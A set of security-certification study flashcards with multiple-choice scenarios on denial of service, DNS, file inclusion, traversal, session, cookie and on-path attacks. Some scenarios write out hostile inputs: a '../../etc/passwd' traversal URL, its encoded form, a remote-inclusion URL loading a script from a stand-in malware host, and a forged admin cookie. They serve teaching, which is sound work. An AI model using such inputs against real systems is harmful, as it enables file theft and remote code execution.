Malicious Activity Flashcards
2.4: Given a scenario, you must be able to analyze indicators of malicious activity
What is the primary goal of a Denial of Service (DoS) attack?
A) To steal sensitive information from a target
B) To make a computer or server’s resources unavailable
C) To gain administrative access to a system
D) To inject malicious code into an application
Answer:
✅ B) To make a computer or server’s resources unavailable
Explanation:
A DoS attack aims to overwhelm a target system so that it cannot respond to legitimate requests. Unlike hacking or data theft, a DoS attack does not attempt to steal information (A) or gain administrative control (C). It also does not involve injecting malicious code (D), which is a characteristic of malware or ransomware attacks.
Which type of flood attack attempts to overload a server with ICMP echo requests?
A) SYN Flood
B) Ping Flood
C) DNS Amplification Attack
D) Fork Bomb
Answer:
✅ B) Ping Flood
Explanation:
A Ping Flood attack sends excessive ICMP Echo Request (ping) packets to a target system, attempting to overwhelm it.
(A) SYN Flood attacks focus on TCP connections.
(C) DNS Amplification exploits large DNS responses.
(D) Fork Bombs create excessive system processes rather than sending network traffic.
What is the primary difference between a DoS and a DDoS attack?
A) A DoS attack targets multiple systems, while a DDoS attack targets one system.
B) A DoS attack involves malware, while a DDoS attack does not.
C) A DDoS attack uses multiple machines to overwhelm a target, while a DoS attack typically uses a single machine.
D) A DDoS attack only occurs on DNS servers, while a DoS attack affects any server.
Answer:
✅ C) A DDoS attack uses multiple machines to overwhelm a target, while a DoS attack typically uses a single machine.
Explanation:
A DoS attack is launched from one machine to exhaust a server’s resources.
A DDoS attack uses a botnet of multiple machines to attack simultaneously.
(A) is incorrect because both DoS and DDoS target single systems.
(B) is incorrect because neither attack requires malware.
(D) is incorrect since DDoS can affect any server, not just DNS.
What technique do attackers use to cause a DNS Amplification attack?
A) Sending multiple ping requests to a DNS server
B) Spoofing the victim’s IP and sending small DNS requests that generate large responses
C) Opening multiple TCP connections but never completing the handshake
D) Overloading a server with a rapid power cycling attack
Answer:
✅ B) Spoofing the victim’s IP and sending small DNS requests that generate large responses
Explanation:
DNS Amplification spoofs the victim’s IP address and sends small DNS queries that generate large responses, overwhelming the victim’s network.
(A) describes a Ping Flood.
(C) describes a SYN Flood.
(D) is a PDoS attack method.
What is the main function of a flood guard?
A) To block excessive SYN packets before they overwhelm a server
B) To prevent malware from infecting a network
C) To route all malicious traffic to a non-existent server
D) To remove botnets from a network
Answer:
✅ A) To block excessive SYN packets before they overwhelm a server
Explanation:
Flood guards detect and block SYN floods, which attempt to exhaust server resources by leaving TCP connections half-open.
(B) is incorrect because flood guards are not antivirus tools.
(C) describes blackholing or sinkholing.
(D) is incorrect because removing botnets requires specialized malware removal.
What is the purpose of a Permanent Denial of Service (PDoS) attack?
A) To temporarily disable a server by overloading it with traffic
B) To exploit a security flaw and permanently damage a device, such as reflashing firmware
C) To take control of a system and steal sensitive data
D) To send large volumes of spam email to a network
Answer:
✅ B) To exploit a security flaw and permanently damage a device, such as reflashing firmware
Explanation:
A PDoS attack (“bricking” a device) permanently damages hardware by installing malicious firmware or overloading the device.
(A) describes a DoS/DDoS attack.
(C) is hacking, not DoS.
(D) describes a spam or phishing attack.
How does a Fork Bomb attack a system?
A) By overloading a network device with malicious firmware
B) By creating an excessive number of processes, exhausting system resources
C) By opening multiple TCP connections but never completing them
D) By sending a flood of DNS requests to a victim
Answer:
✅ B) By creating an excessive number of processes, exhausting system resources
Explanation:
A Fork Bomb continuously creates processes, consuming all available CPU/memory.
(A) describes PDoS.
(C) describes a SYN Flood.
(D) describes DNS Amplification.
What is a limitation of blackholing as a DDoS mitigation technique?
A) It permanently removes attackers from the network
B) Attackers can change IP addresses and continue the attack
C) It is an expensive solution that only large organizations can afford
D) It requires specialized cloud services like Akamai or Cloudflare
Answer:
✅ B) Attackers can change IP addresses and continue the attack
Explanation:
Blackholing routes malicious traffic to a null interface, stopping attacks temporarily. However, attackers can change their IP addresses and resume the attack.
(A) is incorrect because blackholing is temporary.
(C) & (D) are incorrect because blackholing is a simple method, not requiring expensive services.
Which is NOT a DDoS mitigation strategy?
A) Using an Intrusion Prevention System (IPS)
B) Implementing a flood guard
C) Using a botnet to attack attackers
D) Scaling cloud infrastructure
Answer:
✅ C) Using a botnet to attack attackers
Explanation:
Using a botnet to attack is illegal and would be considered offensive hacking.
(A, B, and D) are all valid DDoS mitigation strategies.
Why does DNS typically use UDP instead of TCP?
A) UDP is faster and requires no connection establishment
B) TCP is unreliable for DNS requests
C) DNS does not need to transfer large amounts of data
D) UDP ensures stronger security than TCP
Answer:
✅ A) UDP is faster and requires no connection establishment
Explanation:
DNS primarily uses UDP because it is fast and doesn’t require a three-way handshake like TCP.
(B, C, and D) are incorrect because TCP is used for large DNS queries, not because UDP is more secure.
Scenario:
A financial institution receives reports from customers who claim that when they try to visit their online banking portal, they are redirected to a fake website that looks identical to the real one. The bank’s IT security team investigates and finds that attackers have altered the DNS cache of certain DNS resolvers, causing legitimate customers to be redirected to a malicious IP address.
What type of attack is this?
A) DNS Amplification
B) DNS Cache Poisoning
C) DNS Tunneling
D) DNS Zone Transfer Attack
✅ Correct Answer: B) DNS Cache Poisoning
Explanation:
This attack involves corrupting the DNS resolver’s cache with false information to redirect users to a fake website.
(A) DNS Amplification is incorrect because that attack involves flooding a target with excessive DNS traffic, not redirection.
(C) DNS Tunneling is incorrect because tunneling is used for data exfiltration and bypassing firewalls, not DNS cache manipulation.
(D) DNS Zone Transfer Attack is incorrect because that attack is used for reconnaissance, not redirecting users.
How can the organization prevent this attack?
A) Enable DNSSEC (Domain Name System Security Extensions)
B) Disable all external DNS queries
C) Block all DNS traffic on the firewall
D) Allow only large DNS responses
✅ Correct Answer: A) Enable DNSSEC (Domain Name System Security Extensions)
Explanation:
DNSSEC helps prevent DNS cache poisoning by using cryptographic signatures to verify the authenticity of DNS responses.
(B) Disabling all external DNS queries is impractical because external DNS resolution is necessary for normal internet browsing.
(C) Blocking all DNS traffic would disrupt legitimate web browsing.
(D) Allowing large DNS responses could actually make attacks worse, as attackers could exploit DNS amplification techniques.
Scenario:
An online gaming platform suddenly goes offline. Network traffic logs show that the company’s servers are being flooded with a massive amount of DNS response traffic, all coming from various DNS servers across the internet. Upon further investigation, the security team finds that attackers are sending small DNS queries with the company’s spoofed IP address, which triggers large DNS responses being sent back to their servers.
What type of attack is occurring?
A) DNS Tunneling
B) DNS Amplification Attack
C) DNS Cache Poisoning
D) Domain Hijacking
✅ Correct Answer: B) DNS Amplification Attack
Explanation:
The attacker spoofs the victim’s IP address, sending small queries to open DNS resolvers, which then respond with large traffic volumes, overwhelming the victim.
(A) DNS Tunneling is incorrect because tunneling involves data exfiltration, not high-volume response traffic.
(C) DNS Cache Poisoning is incorrect because DNS caches are not being manipulated, just flooded with traffic.
(D) Domain Hijacking involves stealing control of a domain name, which is not happening in this scenario.
How can organizations mitigate this type of attack?
A) Block all outgoing DNS requests
B) Use DNSSEC to sign DNS records
C) Rate-limit DNS response traffic and restrict large queries
D) Encrypt all DNS queries
✅ Correct Answer: C) Rate-limit DNS response traffic and restrict large queries
Explanation:
Rate-limiting DNS responses reduces the impact of DNS amplification attacks by limiting how frequently a DNS server can respond.
(A) Blocking all outgoing DNS requests would disrupt normal operations.
(B) DNSSEC protects against DNS spoofing, not high-volume flooding.
(D) Encrypting DNS queries (such as using DNS-over-HTTPS) does not prevent amplification, as the attack does not rely on encrypted data.
Scenario:
A company’s firewall is configured to block SSH and HTTP traffic to unauthorized external servers. However, after a security breach, forensic analysis shows that an attacker was sending data to an external server via DNS queries. The attacker used the company’s own DNS infrastructure to bypass the firewall and extract sensitive files.
What type of attack is this?
A) DNS Cache Poisoning
B) DNS Zone Transfer Attack
C) DNS Tunneling
D) DNS Amplification
✅ Correct Answer: C) DNS Tunneling
Explanation:
DNS Tunneling allows attackers to encapsulate malicious traffic inside DNS queries, which usually bypass firewalls.
(A) DNS Cache Poisoning is incorrect because there is no cache manipulation occurring.
(B) DNS Zone Transfer Attack is incorrect because no unauthorized zone transfer is being attempted.
(D) DNS Amplification is incorrect because there is no large-scale flooding of DNS responses.
How can organizations detect and prevent DNS tunneling?
A) Monitor and analyze DNS logs for unusual query patterns
B) Block all external DNS requests
C) Use DNSSEC to prevent data exfiltration
D) Disable all DNS queries on corporate networks
✅ Correct Answer: A) Monitor and analyze DNS logs for unusual query patterns
Explanation:
Unusual query patterns (such as long, encoded queries or frequent lookups for unknown domains) can indicate DNS tunneling.
(B) Blocking all external DNS requests is impractical.
(C) DNSSEC protects against spoofing, not tunneling.
(D) Disabling all DNS queries would disrupt internet access.
Scenario:
An e-commerce company suddenly loses control of its domain name. Customers attempting to visit the website are redirected to an unknown page that asks for credit card details. IT security confirms that the domain’s registration details were changed without authorization, transferring control to an unknown entity.
What type of attack is this?
A) DNS Amplification Attack
B) Domain Hijacking
C) DNS Tunneling
D) DNS Cache Poisoning
✅ Correct Answer: B) Domain Hijacking
Explanation:
Domain Hijacking occurs when an attacker gains unauthorized control over a domain registration.
(A) DNS Amplification does not involve domain registration changes.
(C) DNS Tunneling is incorrect because no data exfiltration is happening.
(D) DNS Cache Poisoning affects DNS resolvers, not domain registration records.
How can companies prevent domain hijacking?
A) Use multi-factor authentication and registry lock on domain registration accounts
B) Encrypt all DNS requests to prevent hijacking
C) Disable all DNS queries to the affected domain
D) Enable DNSSEC to prevent unauthorized domain transfers
✅ Correct Answer: A) Use multi-factor authentication and registry lock on domain registration accounts
Explanation:
Registry locks prevent unauthorized domain name transfers.
(B) Encrypting DNS requests does not protect domain registration.
(C) Disabling DNS queries would only make the site inaccessible.
**(D) DNSSEC does not protect against unauthorized domain transfers.
A web developer at a financial institution is reviewing security logs and notices suspicious requests coming from an external IP. The logs show repeated attempts using URLs such as:
https://securebank.com/account-details?file=../../etc/passwd
The attacker appears to be trying to access system files outside the web document root directory.
What type of attack is the attacker attempting?
A) SQL Injection
B) Directory Traversal Attack
C) Cross-Site Scripting (XSS)
D) Remote File Inclusion (RFI)
✅ Correct Answer: B) Directory Traversal Attack
Explanation:
The attacker is using ../../etc/passwd to navigate outside the web root directory and access system files.
(A) SQL Injection involves injecting SQL code, which is not present in this scenario.
(C) XSS involves injecting JavaScript or HTML to execute in a user’s browser, which is not happening here.
(D) Remote File Inclusion (RFI) involves loading a file from a remote server, which is not the case here.
How can the web server be secured against this attack?
A) Use input validation to block ../ sequences
B) Allow only trusted IP addresses to access system files
C) Encrypt all files on the web server
D) Set file permissions to read-only for all users
✅ Correct Answer: A) Use input validation to block ../ sequences
Explanation:
Input validation prevents users from entering malicious file paths.
(B) Allowing trusted IPs does not address the vulnerability, as the attack exploits a code flaw.
(C) Encrypting files does not stop unauthorized access via directory traversal.
(D) Read-only file permissions do not prevent traversal; they only restrict modifications.
Scenario:
A company’s customer login portal is compromised when attackers exploit a vulnerability in the system. The attackers inject a remote malicious script using the following URL:
https://example.com/login.php?user=http://malware.site/malicious.php
The malicious.php script is executed on the company’s server, allowing the attacker to gain control.
What type of attack is this?
A) Remote File Inclusion (RFI)
B) Local File Inclusion (LFI)
C) SQL Injection
D) Directory Traversal
✅ Correct Answer: A) Remote File Inclusion (RFI)
Explanation:
The attacker injects a remote script (http://malware.site/malicious.php) into the application.
(B) LFI would involve executing existing local files rather than loading one from a remote server.
(C) SQL Injection manipulates databases, which is not happening here.
(D) Directory Traversal tries to access restricted local system files, not execute remote files.
How can organizations prevent Remote File Inclusion attacks?
A) Disable the execution of PHP scripts from remote sources
B) Store all files on an external cloud storage
C) Use strong passwords for user authentication
D) Limit database access to administrators only
✅ Correct Answer: A) Disable the execution of PHP scripts from remote sources
Explanation:
Disabling remote file execution in the server settings prevents the system from executing malicious remote scripts.
(B) Storing files on a cloud does not address the core vulnerability in web application handling.
(C) Strong passwords protect against brute force attacks, not RFI.
(D) Limiting database access does not prevent RFI, as RFI does not involve databases.
Scenario:
A forum allows users to upload images as part of their profiles. An attacker uploads a PHP shell disguised as an image and then accesses it using a directory traversal attack:
https://forum.com/profile.php?file=../../uploads/shell.php
Now, the attacker can execute arbitrary commands on the system.
What type of attack is this?
A) SQL Injection
B) Cross-Site Request Forgery (CSRF)
C) Local File Inclusion (LFI)
D) Remote File Inclusion (RFI)
✅ Correct Answer: C) Local File Inclusion (LFI)
Explanation:
LFI allows an attacker to execute files that already exist on the local server.
(A) SQL Injection involves database manipulation, not file execution.
(B) CSRF forces users to perform unintended actions, which is unrelated.
(D) RFI requires files to be loaded from external sources, which is not the case here.
What is the best way to prevent LFI attacks?
A) Restrict file uploads to only non-executable formats (e.g., JPEG, PNG)
B) Allow users to upload files directly to the root directory
C) Use weak encryption to mask file names
D) Increase server RAM to handle large file loads
✅ Correct Answer: A) Restrict file uploads to only non-executable formats (e.g., JPEG, PNG)
Explanation:
Restricting file types prevents attackers from uploading executable scripts like PHP files.
(B) Allowing uploads to the root directory increases risk.
(C) Weak encryption does not prevent malicious execution.
(D) Increasing server RAM does not address the security vulnerability.
Scenario:
A penetration tester notices that a website’s security filters block normal directory traversal attempts using ../. However, when trying %2e%2e%2f, the server successfully processes the request and grants access to restricted files.
What technique is the attacker using?
A) SQL Injection Encoding
B) Directory Traversal Encoding
C) Command Injection
D) Remote File Execution
✅ Correct Answer: B) Directory Traversal Encoding
Explanation:
The attacker encodes ../ as %2e%2e%2f to bypass security filters.
(A) SQL Injection Encoding applies to database queries, not file path manipulation.
(C) Command Injection targets command-line execution, not file path traversal.
(D) Remote File Execution is RFI-related, not a traversal technique.
What is the best mitigation for directory traversal encoding attacks?
A) Normalize input and decode characters before processing
B) Remove all slashes (/) from URLs
C) Use CAPTCHA to verify human users
D) Allow only administrator access to system files
✅ Correct Answer: A) Normalize input and decode characters before processing
Explanation:
Decoding input before processing helps security filters detect encoded traversal attempts.
(B) Removing slashes would break URL functionality.
(C) CAPTCHA does not stop file system attacks.
(D) Restricting administrator access is good, but does not prevent traversal attempts.
Scenario:
A security analyst is investigating a breach in a corporate system. The attacker was able to run unauthorized scripts within the system after exploiting a vulnerability in an outdated web application. The attack allowed the hacker to execute commands at will, manipulating system files and stealing sensitive data.
What type of attack did the hacker perform?
A) Privilege Escalation
B) Arbitrary Code Execution (ACE)
C) Rootkit Installation
D) SQL Injection
✅ Correct Answer: B) Arbitrary Code Execution (ACE)
Explanation:
The attacker was able to run their own code on the system without restrictions, which defines Arbitrary Code Execution.
(A) Privilege Escalation occurs when attackers gain higher access, but in this case, they are running arbitrary code, not necessarily escalating privileges.
(C) Rootkit Installation may be a later step, but the main attack executed unauthorized code first.
(D) SQL Injection affects databases, but this scenario involves running system commands.
What is the best way to prevent arbitrary code execution attacks?
A) Keep software and applications updated to patch vulnerabilities
B) Allow only administrator accounts to install software
C) Disable antivirus software to reduce system slowdowns
D) Change file names frequently to confuse attackers
✅ Correct Answer: A) Keep software and applications updated to patch vulnerabilities
Explanation:
Most ACE vulnerabilities come from outdated or unpatched software.
(B) Limiting software installation helps but does not prevent execution of existing vulnerabilities.
(C) Disabling antivirus makes the system more vulnerable.
(D) Changing file names does not prevent execution of malicious code.
Scenario:
A financial services company detects that its web server was compromised. Logs reveal that an attacker sent a malicious request over the internet, exploiting a vulnerability in the server’s web application framework. The attacker successfully executed commands remotely, allowing them to modify financial records.
What type of attack did the hacker perform?
A) Remote Code Execution (RCE)
B) Horizontal Privilege Escalation
C) Phishing Attack
D) SQL Injection
✅ Correct Answer: A) Remote Code Execution (RCE)
Explanation:
The attacker sent and executed malicious code remotely, which is Remote Code Execution (RCE).
(B) Horizontal Privilege Escalation involves accessing another user’s data at the same privilege level, which is not the case here.
(C) Phishing Attack involves tricking users into revealing credentials, but this attack exploited a software vulnerability.
(D) SQL Injection targets databases, not code execution.
What is the best way to prevent Remote Code Execution attacks?
A) Disable all internet access to prevent external threats
B) Use Web Application Firewalls (WAFs) and apply security patches
C) Delete all logs to hide traces of exploitation
D) Allow users to execute any code on the server
✅ Correct Answer: B) Use Web Application Firewalls (WAFs) and apply security patches
Explanation:
WAFs help detect and block malicious requests before they reach the server.
Patching software fixes vulnerabilities that attackers exploit for RCE attacks.
(A) Disabling internet access is unrealistic for a web-based company.
(C) Deleting logs does not prevent attacks.
(D) Allowing users to execute code freely increases security risks.
Scenario:
A hacker gains access to a company’s network as a normal user. They exploit a vulnerability in a background system process, which allows them to elevate their privileges from a standard user to administrator level.
What type of attack is this?
A) Vertical Privilege Escalation
B) Horizontal Privilege Escalation
C) Rootkit Attack
D) Brute Force Attack
✅ Correct Answer: A) Vertical Privilege Escalation
Explanation:
The attacker escalates from a normal user to an administrator, which is vertical privilege escalation.
(B) Horizontal Privilege Escalation would involve accessing another user’s account at the same privilege level.
(C) Rootkit Attack is a technique to hide malware, not necessarily elevate privileges.
(D) Brute Force Attack involves guessing passwords, not escalating privileges.
What is the best way to prevent vertical privilege escalation?
A) Implement least privilege principles and use Multi-Factor Authentication (MFA)
B) Allow all users to have admin rights
C) Disable firewalls to improve system performance
D) Encrypt all files on the system
✅ Correct Answer: A) Implement least privilege principles and use Multi-Factor Authentication (MFA)
Explanation:
Least privilege access ensures that users only have the permissions they need.
MFA makes it harder for attackers to gain higher-level access.
(B) Giving admin rights to all users increases risks.
(C) Disabling firewalls makes attacks easier.
(D) Encrypting files does not prevent privilege escalation.
Scenario:
An IT administrator finds that even after removing a detected malware and rebooting the system, the malware reinstalls itself automatically. After investigation, they discover that the malware was deeply embedded in system processes and could hide itself from antivirus detection.
What type of malware is causing this issue?
A) Trojan Horse
B) Rootkit
C) Keylogger
D) Worm
✅ Correct Answer: B) Rootkit
Explanation:
Rootkits are designed to hide their presence and persist even after reboots.
(A) Trojan Horses disguise themselves as legitimate software but do not usually hide deep in system processes.
(C) Keyloggers record keystrokes but do not persist deeply at the system level.
(D) Worms spread automatically, but they do not necessarily hide themselves.
What is the most dangerous type of rootkit?
A) User Mode Rootkit
B) Kernel Mode Rootkit
C) Boot Sector Virus
D) Spyware
✅ Correct Answer: B) Kernel Mode Rootkit
Explanation:
Kernel Mode Rootkits run in Ring 0, the highest privilege level, allowing them to fully control the OS.
(A) User Mode Rootkits operate at a lower privilege level and depend on system features.
(C) Boot Sector Viruses infect the boot sector, but they are not rootkits.
(D) Spyware steals information but does not hide itself like rootkits.
Scenario:
A bank customer logs into their online banking account. An attacker on the same network captures the login request containing the customer’s credentials. Later, the attacker resends (replays) the login request to the bank’s server and successfully logs in as the victim.
What type of attack has occurred?
A) Session Hijacking
B) Man-in-the-Middle Attack
C) Replay Attack
D) SQL Injection
✅ Correct Answer: C) Replay Attack
Explanation:
Replay attacks involve capturing valid authentication data and retransmitting it later.
(A) Session Hijacking modifies active sessions rather than replaying past requests.
(B) Man-in-the-Middle (MITM) Attacks intercept and alter real-time communications, but this scenario focuses on replaying old data.
(D) SQL Injection manipulates databases, which is unrelated to authentication replays.
How can the bank prevent this type of attack?
A) Encrypt login credentials but allow sessions to remain valid indefinitely
B) Implement session tokens that expire after a short period
C) Allow customers to store their credentials in plaintext for convenience
D) Use CAPTCHA during login to slow down attackers
✅ Correct Answer: B) Implement session tokens that expire after a short period
Explanation:
Session tokens prevent replay attacks by making authentication unique to each session.
(A) Keeping sessions indefinitely increases security risks.
(C) Storing credentials in plaintext makes attacks easier.
**(D) CAPTCHA slows attackers but does not prevent replaying old requests.
Scenario:
A user logs into an online shopping website. An attacker captures the login credentials during the session and later replays the captured credentials to gain unauthorized access, allowing them to place fraudulent orders.
What type of attack is this?
A) Credential Replay Attack
B) Phishing Attack
C) Buffer Overflow Attack
D) Cross-Site Scripting (XSS)
✅ Correct Answer: A) Credential Replay Attack
Explanation:
The attacker captures login credentials and reuses them, making it a credential replay attack.
(B) Phishing involves tricking users into giving up credentials directly.
(C) Buffer Overflow involves sending excessive input to crash programs, which is unrelated.
(D) XSS injects malicious scripts into web pages, not replaying login data.
How can the website prevent credential replay attacks?
A) Use multi-factor authentication (MFA) requiring an extra security step
B) Allow users to save their login credentials in cookies for convenience
C) Disable HTTPS to speed up logins
D) Extend session expiration time to prevent frequent logouts
✅ Correct Answer: A) Use multi-factor authentication (MFA) requiring an extra security step
Explanation:
MFA makes it harder for attackers to replay login credentials because they lack the extra authentication factor (e.g., a one-time passcode).
(B) Saving login credentials in cookies increases risk.
(C) Disabling HTTPS makes logins less secure.
(D) Extending session expiration increases the attack window.
Scenario:
A security analyst is investigating two types of network attacks.
In one attack, the hacker modifies data in an active session.
In the second attack, the hacker captures valid login data and replays it later.
What is the difference between these two attacks?
A) The first attack is a replay attack, and the second attack is session hijacking
B) The first attack is session hijacking, and the second attack is a replay attack
C) Both attacks are the same since they involve authentication
D) Both attacks are prevented by increasing network bandwidth
✅ **Correct Answer: B) The first attack is session hijacking, and the second attack is a replay attack
Explanation:
Session Hijacking occurs when the attacker modifies real-time data during an active session.
Replay Attacks involve capturing and reusing past authentication data.
(A) is incorrect because the attacks are reversed.
(C) is incorrect because they differ in execution.
(D) is incorrect because increasing bandwidth does not prevent these attacks.
Scenario:
A company uses an outdated Wi-Fi security protocol, WEP (Wired Equivalent Privacy). Security analysts discover that attackers can capture authentication packets and replay them to gain unauthorized access to the network.
What is the best security protocol to prevent this type of replay attack?
A) WEP
B) WPA2
C) WPA3
D) MAC Filtering
✅ Correct Answer: C) WPA3
Explanation:
WPA3 improves encryption and prevents replay attacks.
(A) WEP is outdated and highly vulnerable to replay attacks.
**(B) WPA2 is better but still has some known weaknesses.
(D) MAC Filtering does not prevent replay attacks, as MAC addresses can be spoofed.
Scenario:
A government agency wants to protect its secure online portals from replay attacks. The cybersecurity team implements session tokens that are unique and expire after a short time.
How do session tokens prevent replay attacks?
A) They are randomly generated and difficult to predict
B) They store the user’s credentials permanently for future logins
C) They prevent the user from logging into multiple devices
D) They encrypt all traffic between the user and the server
✅ Correct Answer: A) They are randomly generated and difficult to predict
Explanation:
Session tokens are unique for each session and expire quickly, making them useless if intercepted.
(B) Permanent storage of credentials increases risk.
(C) Tokens do not prevent multiple logins but ensure each session is unique.
**(D) Encryption helps, but it does not prevent replaying captured credentials.
Scenario:
A company requires employees to log in with a password and a one-time passcode (OTP) sent to their phone. Even if an attacker captures an employee’s credentials, they cannot log in without access to the OTP.
What security measure is the company using to prevent replay attacks?
A) Session Tokens
B) Multi-Factor Authentication (MFA)
C) IP Whitelisting
D) Biometric Authentication
✅ Correct Answer: B) Multi-Factor Authentication (MFA)
Explanation:
MFA adds an extra layer of security, preventing attackers from reusing stolen credentials.
(A) Session tokens prevent session hijacking but do not replace MFA.
(C) IP whitelisting helps but does not fully prevent replay attacks.
(D) Biometrics can be part of MFA but is not the sole reason for security.
Scenario:
A user logs into an online learning platform. Each time they navigate to a new page, they have to log in again, even though they already authenticated. The developer explains that this happens because HTTP is stateless and does not remember previous requests.
What does it mean that HTTP is stateless?
A) HTTP remembers user sessions until the browser is closed
B) HTTP does not retain information about previous requests
C) HTTP automatically stores all user session details on the server
D) HTTP encrypts and saves session data for future logins
✅ Correct Answer: B) HTTP does not retain information about previous requests
Explanation:
HTTP is stateless, meaning each request is independent and the server does not remember past interactions.
(A) Incorrect – HTTP does not remember sessions without cookies or tokens.
(C) Incorrect – Sessions must be managed with external storage mechanisms (cookies, sessions, or databases).
(D) Incorrect – HTTP does not encrypt or store session data by default.
Scenario:
A shopping website wants to keep users logged in even after they close their browser. The developer decides to use persistent cookies to store session information.
Which type of cookie should be used?
A) Session cookies
B) Persistent cookies
C) Temporary cookies
D) Encrypted cookies
✅ Correct Answer: B) Persistent cookies
Explanation:
Persistent cookies remain in the browser cache until manually deleted or they expire.
(A) Session cookies disappear when the browser is closed.
(C) Temporary cookies is not a real technical term in this context.
(D) Encryption is a security measure but does not determine cookie persistence.
Scenario:
A user logs into a secure banking website on public Wi-Fi. An attacker on the same network steals the session cookie using a network sniffing tool and gains access to the user’s banking session.
What type of attack is the hacker using?
A) Cookie Poisoning
B) Session Hijacking
C) Session Prediction
D) SQL Injection
✅ Correct Answer: B) Session Hijacking
Explanation:
Session hijacking occurs when an attacker steals a session token and takes over an active session.
(A) Cookie Poisoning modifies a cookie instead of stealing it.
(C) Session Prediction involves guessing session tokens, not stealing them.
(D) SQL Injection exploits databases, not session cookies.
How can the bank protect users from session hijacking?
A) Use HTTPS and secure cookies
B) Allow users to store session data in plaintext
C) Increase session timeout to several hours
D) Disable all cookies
✅ Correct Answer: A) Use HTTPS and secure cookies
Explanation:
HTTPS encrypts session cookies, preventing attackers from stealing them via network sniffing.
(B) Storing session data in plaintext increases security risks.
(C) Long session timeouts increase the attack window.
(D) Disabling cookies may break session functionality.
Scenario:
A website stores user roles in cookies as follows:
user=John; role=basic_user
An attacker modifies the cookie to:
user=John; role=admin
Now, they can access admin-only pages.
What type of attack is this?
A) Cookie Poisoning
B) Session Hijacking
C) Cross-Site Scripting (XSS)
D) Phishing Attack
✅ Correct Answer: A) Cookie Poisoning
Explanation:
Cookie Poisoning modifies stored cookies to escalate privileges or exploit security flaws.
(B) Session Hijacking steals an existing valid session, while cookie poisoning modifies stored cookies.
(C) XSS injects malicious JavaScript but does not modify cookies directly.
(D) Phishing tricks users into revealing credentials but does not modify cookies.
How can websites prevent cookie poisoning?
A) Store sensitive data only on the client’s browser
B) Encrypt and sign cookies
C) Allow users to edit their own cookies
D) Use only session cookies with no expiration
✅ Correct Answer: B) Encrypt and sign cookies
Explanation:
Encrypted cookies ensure attackers cannot modify their content.
(A) Storing sensitive data on the client’s browser is risky.
(C) Allowing users to edit cookies increases security risks.
**(D) Session cookies do not prevent modification of stored cookies.
Scenario:
A hacker discovers that a website generates predictable session tokens like:
session=1001
session=1002
session=1003
By guessing the next session ID, the hacker gains unauthorized access.
What type of attack is this?
A) Session Hijacking
B) Session Prediction
C) Cookie Poisoning
D) DNS Spoofing
✅ Correct Answer: B) Session Prediction
Explanation:
Session Prediction happens when session tokens are weak and easily guessed.
(A) Session Hijacking requires stealing an active session, not guessing.
(C) Cookie Poisoning modifies cookies but does not predict session tokens.
(D) DNS Spoofing misdirects users to a fake website.
How can websites prevent session prediction?
A) Use strong, unpredictable session tokens
B) Store session tokens in plaintext
C) Disable authentication requirements
D) Allow users to set their own session tokens
✅ Correct Answer: A) Use strong, unpredictable session tokens
Explanation:
Strong session tokens make guessing attacks impossible.
(B) Storing tokens in plaintext increases security risks.
(C) Disabling authentication removes security entirely.
(D) Allowing users to set session tokens makes them easier to predict.
Scenario:
A hacker gains access to a corporate Wi-Fi network and manipulates ARP tables to position themselves between employees’ devices and the network gateway. This allows them to capture login credentials sent over HTTP.
What type of attack is the hacker performing?
A) Rogue Access Point Attack
B) ARP Poisoning (On-Path Attack)
C) DNS Spoofing
D) Denial of Service (DoS) Attack
✅ Correct Answer: B) ARP Poisoning (On-Path Attack)
Explanation:
ARP Poisoning is a Man-in-the-Middle (On-Path) attack where the attacker manipulates the ARP table to redirect traffic through their device.
(A) Rogue Access Point Attack is a fake Wi-Fi network, but here the attacker manipulated ARP tables.
(C) DNS Spoofing alters domain resolution, but here the attacker redirected network traffic.
(D) DoS attacks disrupt service, but do not involve intercepting traffic.
How can the company prevent this attack?
A) Use static ARP entries to prevent ARP spoofing
B) Disable HTTPS on internal applications
C) Allow unencrypted traffic for easy monitoring
D) Lower firewall restrictions
✅ Correct Answer: A) Use static ARP entries to prevent ARP spoofing
Explanation:
Static ARP entries prevent ARP spoofing attacks because the ARP table does not accept changes dynamically.
(B) Disabling HTTPS makes attacks easier, not harder.
(C) Allowing unencrypted traffic exposes sensitive data.
(D) Lowering firewall restrictions increases security risks.
Scenario:
A company uses a wireless authentication system that requires users to enter a one-time passcode to log in. A hacker captures an authentication request and replays the request later to gain unauthorized access.
What type of attack is this?
A) Relay Attack
B) Replay Attack
C) Downgrade Attack
D) SSL Stripping
✅ Correct Answer: B) Replay Attack
Explanation:
A replay attack involves capturing valid authentication data and reusing it later.
(A) Relay Attack involves the attacker actively modifying communication in real-time.
(C) Downgrade Attack forces a lower security level, but does not reuse authentication packets.
(D) SSL Stripping removes HTTPS encryption but is not a replay attack.
How can the company prevent replay attacks?
A) Implement session tokens with expiration
B) Use predictable authentication keys
C) Store login credentials in plaintext
D) Allow unrestricted session reuse
✅ Correct Answer: A) Implement session tokens with expiration
Explanation:
Session tokens that expire prevent replay attacks because the captured data becomes useless after a short time.
(B) Predictable authentication keys make attacks easier.
(C) Storing credentials in plaintext increases security risks.
(D) Allowing session reuse enables attackers to replay old sessions.
Scenario:
An attacker places themselves between a banking website and a customer. While the customer initiates a transaction, the attacker modifies the amount before relaying the request to the bank.
What type of attack is being used?
A) Replay Attack
B) SSL Stripping
C) Relay Attack
D) ARP Poisoning
✅ Correct Answer: C) Relay Attack
Explanation:
Relay Attacks involve intercepting and modifying real-time communication.
(A) Replay Attacks reuse valid authentication data later but do not modify it.
(B) SSL Stripping downgrades encrypted HTTPS to HTTP, but does not modify data.
(D) ARP Poisoning redirects traffic, but does not always modify transactions.
How can banks protect users from relay attacks?
A) Require multi-factor authentication (MFA) for transactions
B) Use weak encryption for faster performance
C) Store transaction details in plaintext for easier access
D) Allow unlimited session times
✅ Correct Answer: A) Require multi-factor authentication (MFA) for transactions
Explanation:
MFA prevents attackers from completing unauthorized transactions even if they intercept data.
(B) Weak encryption makes attacks easier.
(C) Storing plaintext transaction details increases risk.
(D) Unlimited session times allow long-lived attacks.
Scenario:
A user logs into their email on public Wi-Fi. The attacker intercepts the initial unencrypted HTTP request and prevents the redirect to HTTPS, keeping the session unencrypted.
What attack is being used?
A) SSL Stripping
B) Downgrade Attack
C) DNS Spoofing
D) Relay Attack
✅ Correct Answer: A) SSL Stripping
Explanation:
SSL Stripping downgrades an HTTPS request to HTTP, allowing the attacker to intercept unencrypted data.
(B) Downgrade Attack forces weaker encryption but does not strip HTTPS entirely.
(C) DNS Spoofing redirects users to a fake website, rather than keeping them on HTTP.
(D) Relay Attack modifies data, but does not downgrade encryption.
